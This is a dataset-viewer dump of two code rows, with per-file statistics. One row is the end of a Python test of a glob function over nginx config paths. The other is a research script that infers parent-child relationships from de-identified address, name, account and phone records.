'/etc/nginx/conf.d/host.conf',
'/etc/nginx/conf.d/proxy.conf',
'/etc/nginx/conf.d/ssl.conf',
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf',
'/etc/nginx/ssl/soft2run_ssl_cert.conf',
'/etc/nginx/ssl/sph_ssl_cert.conf'
]
results = glib.glib(file_paths, pattern)
assert_that(results, has_length(15))
matches = [
'/etc/nginx/conf.d/servers/bamboo_server.conf',
'/etc/nginx/conf.d/servers/dev1_server.conf',
'/etc/nginx/conf.d/servers/dev1db00_server.conf',
'/etc/nginx/conf.d/servers/docker_build_server.conf',
'/etc/nginx/conf.d/servers/docker_registry_server.conf',
'/etc/nginx/conf.d/servers/eurotax_proxy.conf',
'/etc/nginx/conf.d/servers/int01_server.conf',
'/etc/nginx/conf.d/servers/int01db00_server.conf',
'/etc/nginx/conf.d/servers/nexus_server.conf',
'/etc/nginx/conf.d/servers/soft2run_server.conf',
'/etc/nginx/conf.d/servers/spearhead_server.conf',
'/etc/nginx/conf.d/servers/toolsdb_server.conf',
'/etc/nginx/conf.d/servers/webcache_server.conf.bak',
'/etc/nginx/conf.d/servers/webcache_server_working.conf',
'/etc/nginx/conf.d/tcp_streams/iboxdb_server.conf'
]
for result in results:
assert_that(result, any_of(*matches))
# TODO: Add more tests for individual instances and edge cases.
| 41.647059
| 69
| 0.599929
| 721
| 5,664
| 4.560333
| 0.165049
| 0.16545
| 0.215328
| 0.229319
| 0.761253
| 0.738139
| 0.738139
| 0.738139
| 0.738139
| 0.738139
| 0
| 0.013349
| 0.246116
| 5,664
| 135
| 70
| 41.955556
| 0.756674
| 0.025247
| 0
| 0.622807
| 0
| 0
| 0.572569
| 0.541546
| 0
| 0
| 0
| 0.007407
| 0.052632
| 1
| 0.026316
| false
| 0
| 0.026316
| 0
| 0.061404
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b7739416d6abe02092e5d04875f0a01a8c7cb6af
| 38,076
|
py
|
Python
|
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
Source/decisionTreeV7.py
|
xiayuan-huang/E-pedigrees
|
5b49cbeabf60432abb037b0a33780f9c486ec84c
|
[
"MIT"
] | null | null | null |
'''
@author: xiayuanhuang
'''
'''
debugging child's age larger than parents'age
'''
import readDataV2
import datetime
class DT(object):
def __init__(self, addressFile, nameFile, demoFile, accountFile):
d = readDataV2.ReadData()
d.readAddress(addressFile)
d.readName(nameFile)
d.readDemo(demoFile)
d.readAccount(accountFile)
# d.readAddress('/Users/xiayuanhuang/documents/project/address_deid.csv')
# d.readName('/Users/xiayuanhuang/documents/project/name_deid.csv')
# d.readDemo('/Users/xiayuanhuang/documents/project/demo_deid.csv')
# d.readAccount('/Users/xiayuanhuang/documents/project/account_deid.csv')
# d.readAddress('test_address.txt')
# d.readName('test_name.txt')
# d.readDemo('test_demo.txt')
# d.readAccount('test_account.txt')
self.data = d.data
self.data2 = d.data2
self.data3 = d.data3
self.data4 = d.data4
self.address = d.address
self.lastName = d.lastName
self.gender = d.gender
self.age = d.age
self.dob = d.dob
self.dateOfDeceased = d.dateOfDeceased
self.accountToID = d.accountToID
self.account = d.account
self.phone = d.phone
def predict(self):
self.p_c = []
for i in self.address:
if len(self.address[i]) > 1:
IDs= list(set(self.address[i]))
#print(adds)
self.relation(i, IDs)
def relation(self, adds, ids):
num = len(ids)
for i in range(num-1):
if ids[i] not in self.gender:
continue
for j in range(i+1, num):
id1 = ids[i]
id2 = ids[j]
if id2 not in self.gender:
continue
#print(num, ids, id1, id2)
for year_range_id1 in self.data[id1][adds]:
for year_range_id2 in self.data[id2][adds]:
y1 = year_range_id1[0]
y2 = year_range_id1[1]
y3 = year_range_id2[0]
y4 = year_range_id2[1]
if y1 =='':
y1 = 0
else:
y1 = int(y1)
if y2 =='':
y2 = datetime.datetime.now().year
else:
y2 = int(y2)
if y3 == '':
y3 = 0
else:
y3 = int(y3)
if y4 == '':
y4 = datetime.datetime.now().year
else:
y4 = int(y4)
a = range(y1, y2+1)
b = range(y3, y4+1)
if self.age[id1] == '' or self.age[id2] == '':
break
if len(set(a).intersection(set(b)))>=3:
names1 = list(self.lastName[id1].keys())
names2 = list(self.lastName[id2].keys())
intername = list(set(names1).intersection(set(names2)))
if len(intername) == 0:
break
else:
nameOverlap = False
for na in intername:
for period_name_id1 in self.lastName[id1][na]:
for period_name_id2 in self.lastName[id2][na]:
newy1 = period_name_id1[0]
newy2 = period_name_id1[1]
newy3 = period_name_id2[0]
newy4 = period_name_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=3:
nameOverlap = True
break
else:
continue
else:
continue
break
if nameOverlap:
if 18<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=45:
# make sure parent's deceased date is later than child's date of birth
if int(self.dob[id1]) < int(self.dob[id2]):
elderOne = id1
youngerOne = id2
else:
elderOne = id2
youngerOne = id1
if elderOne in self.dateOfDeceased:
if int(self.dateOfDeceased[elderOne]) < int(self.dob[youngerOne]):
break
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if 0<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=16:
#add to sibling relationship
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
#self.p_c.append(pair)
else:
pair = (id1, id2)
#self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
#self.p_c.append(pair)
else:
pair = (id2, id1)
#self.p_c.append(pair)
else:
if 18<=abs(int(self.dob[id1])-int(self.dob[id2])) and abs(int(self.dob[id1])-int(self.dob[id2]))<=45 and min(int(self.age[id1]), int(self.age[id2]))<3:
'''
here the condition was hard coded to 2014 since the most recent birth year recorded in the file was 2014
set the min age of one pair of individuals blow 3 years old
'''
if int(self.dob[id1]) < int(self.dob[id2]):
elderOne = id1
youngerOne = id2
else:
elderOne = id2
youngerOne = id1
if elderOne in self.dateOfDeceased:
if int(self.dateOfDeceased[elderOne]) < int(self.dob[youngerOne]):
break
flagAcc = False
flagPhone = False
if id1 in self.account and id2 in self.account:
acc1 = list(self.account[id1].keys())
acc2 = list(self.account[id2].keys())
interacc = list(set(acc1).intersection(set(acc2)))
if len(interacc) == 0:
pass
else:
for acc in interacc:
for period_acc_id1 in self.account[id1][acc]:
for period_acc_id2 in self.account[id2][acc]:
newy1 = period_acc_id1[0]
newy2 = period_acc_id1[1]
newy3 = period_acc_id2[0]
newy4 = period_acc_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagAcc = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if id1 in self.phone and id2 in self.phone:
phone1 = list(self.phone[id1].keys())
phone2 = list(self.phone[id2].keys())
interpho = list(set(phone1).intersection(set(phone2)))
if len(interpho) == 0:
pass
else:
for ph in interpho:
for period_phone_id1 in self.phone[id1][ph]:
for period_phone_id2 in self.phone[id2][ph]:
newy1 = period_phone_id1[0]
newy2 = period_phone_id1[1]
newy3 = period_phone_id2[0]
newy4 = period_phone_id2[1]
if newy1 == '':
newy1 = 0
else:
newy1 = int(newy1)
if newy2 == '':
newy2 = datetime.datetime.now().year
else:
newy2 = int(newy2)
if newy3 == '':
newy3 = 0
else:
newy3 = int(newy3)
if newy4 == '':
newy4 = datetime.datetime.now().year
else:
newy4 = int(newy4)
newa = range(newy1, newy2+1)
newb = range(newy3, newy4+1)
if len(set(newa).intersection(set(newb)))>=1:
flagPhone = True
break
else:
continue
break
else:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
if flagAcc or flagPhone:
if int(self.dob[id1])<int(self.dob[id2]):
if id1 in self.dateOfDeceased:
if int(self.dateOfDeceased[id1])>int(self.dob[id2]):
pair = (id1, id2)
self.p_c.append(pair)
else:
pair = (id1, id2)
self.p_c.append(pair)
else:
if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
else:
# check if the child younger than three years old
pass
else:
continue
break
def writeToFile(self, outputFile):
fileOut = open(outputFile, 'w')
for i in self.p_c:
fileOut.write(i[0])
fileOut.write('\t')
fileOut.write(i[1])
fileOut.write('\n')
fileOut.flush()
fileOut.close()
| 67.992857
| 187
| 0.240808
| 2,214
| 38,076
| 4.075429
| 0.074526
| 0.05896
| 0.059847
| 0.047878
| 0.770365
| 0.759282
| 0.759282
| 0.759282
| 0.759282
| 0.759282
| 0
| 0.052724
| 0.701124
| 38,076
| 559
| 188
| 68.11449
| 0.740158
| 0.024005
| 0
| 0.83559
| 0
| 0
| 0.000136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007737
| false
| 0.01354
| 0.003868
| 0
| 0.01354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.